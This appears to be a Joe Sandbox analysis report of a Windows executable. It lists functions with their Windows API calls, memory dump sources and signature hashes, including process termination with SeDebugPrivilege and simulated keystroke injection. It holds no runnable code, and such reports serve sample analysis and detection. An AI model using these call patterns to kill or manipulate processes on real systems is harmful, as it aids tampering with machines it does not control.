                                                                                                                                                  • Opcode ID: 144edc9b09e347110a533c5830e348cf9a8f01d0fb3062f17fea6b7e2b0f1dc9
                                                                                                                                                  • Instruction ID: e58261dff0f2985f7021d20891fed9316d3a0d67663b0282c26a9f491eaa7395
                                                                                                                                                  • Opcode Fuzzy Hash: 144edc9b09e347110a533c5830e348cf9a8f01d0fb3062f17fea6b7e2b0f1dc9
                                                                                                                                                  • Instruction Fuzzy Hash: F651B07190050ACBCF10DFA8E958AECBFB8FF49310FA54299D441A7266CB759E24CB54
                                                                                                                                                  Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00478F00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 560350794-0
                                                                                                                                                  • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                  • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                                                                                                                                  • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                                                                                                                                  • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                                                                                                                                  Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0047F6B5
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0047FB22
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                                  • Opcode ID: 553cec400721afd5eed0b01d75d33cb7bb54fbf11b1f514b6aea5bab6d8c8d90
                                                                                                                                                  • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                                                                                                                                  • Opcode Fuzzy Hash: 553cec400721afd5eed0b01d75d33cb7bb54fbf11b1f514b6aea5bab6d8c8d90
                                                                                                                                                  • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                                                                                                                                  Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                                                                                    • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                                                                                    • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00464D5A
                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 793581249-0
                                                                                                                                                  • Opcode ID: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                                                                                  • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                                                                                                                                  • Opcode Fuzzy Hash: 9f483328b87e2f9089392b2207326b9a11b8e00c1f4561b81bc0a43578ca8f4b
                                                                                                                                                  • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                                                                                                                                  Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                  • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                  • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                                                                                                                                  • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                                                                                                                                  • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                                                                                                                                  Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                                                                                                                                  • DestroyIcon.USER32(00000000), ref: 0043C37F
                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                                                                                                                                  • DestroyIcon.USER32(?), ref: 0043C3AB
                                                                                                                                                    • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2819616528-0
                                                                                                                                                  • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                                                                                  • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                                                                                                                                  • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                                                                                                                                  • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                                                                                                                                  Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                                                                                                                                    • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                                                                                                                                    • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                  • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                                                                                  • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                                                                                                                                  • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                                                                                  • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                                                                                                                                  Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                                                                                                  • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                                  • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                                                                                  • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                                                                                                  • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                                                                                  • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                                                                                                  Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                                                                                    • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                                                                                    • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                                                                                    • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                                                                                                                                  • _memset.LIBCMT ref: 00479813
                                                                                                                                                  • _memset.LIBCMT ref: 00479956
                                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 0047998D
                                                                                                                                                  Strings
                                                                                                                                                  • NULL Pointer assignment, xrefs: 004799DB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                                  • Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                                                                                                  • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                                                                                                                                  • Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                                                                                                                                  • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                                                                                                                                  Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                                                                                                  • _wcscat.LIBCMT ref: 00486EAD
                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                                  • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                  • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                                                                                  • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                                                                                  • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                                                                                  Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                                                                                    • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                                                                                    • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                  • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                  • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                                                                                                                                  • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                                                                                                                                  • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                                                                                                                                  Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
